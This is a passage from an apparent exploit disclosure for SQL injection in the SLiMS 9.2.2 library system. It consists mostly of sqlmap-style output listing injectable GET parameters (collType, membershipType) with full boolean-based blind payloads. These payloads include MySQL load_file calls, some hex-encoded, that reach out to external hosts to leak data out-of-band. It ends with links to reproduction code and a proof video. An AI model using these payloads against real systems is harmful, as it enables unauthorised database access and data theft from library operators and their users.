/>load_file(0x5c5c5c5c3172746239777132393937646638783478326364746d70346b76716f656532353574776a6a6237302e736c696d732e7765622e69645c5c617667))+''<br />ELSE 0x28 END)) AND 'xMPZ'='xMPZ&membershipType=a''&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id<br />\\dzd'))+'<br />---<br /><br />01<br />---<br />Parameter: collType (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or<br />GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\<br />716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select<br />load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a''&collType=aaaa'+(select<br />load_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+''<br />RLIKE (SELECT (CASE WHEN (2279=2279) THEN 0x61616161+(select<br />load_file(0x5c5c5c5c646374697930687a69777a643478756a6671716366643375756c306b6f61633166703666743968792e736c696d732e7765622e69645c5c777466))+''+(select<br />load_file(0x5c5c5c5c617a6469746d3536316837666b7533796a39397573386e653235387a77706b676e346575316f70642e736c696d732e7765622e69645c5c647a64))+''<br />ELSE 0x28 END)) AND 'MGZY'='MGZY<br />---<br /><br />03<br />---<br />Parameter: membershipType (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or<br />GROUP BY clause<br /> Payload: reportView=true&year=2002&class=bbbb'+(select load_file('\\\\<br />716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''+(select<br />load_file('\\\\1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.id\\avg'))+'&membershipType=a'''<br />RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x612727 ELSE 0x28 END)) AND<br />'ckmk'='ckmk&collType=aaaa'+(select load_file('\\\\<br />dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(select<br />load_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id<br />\\dzd'))+'<br />---<br />```<br /><br />## Reproduce:<br />[href](<br />https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi<br />)<br /><br />## Reference:<br />[Using HTTP cookies](<br />https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/1m0y6c)<br /><br />## Time spent<br />`00:35:00`<br /><br />## Writing an exploit<br />`00:15:00`<br /><br /></code></pre>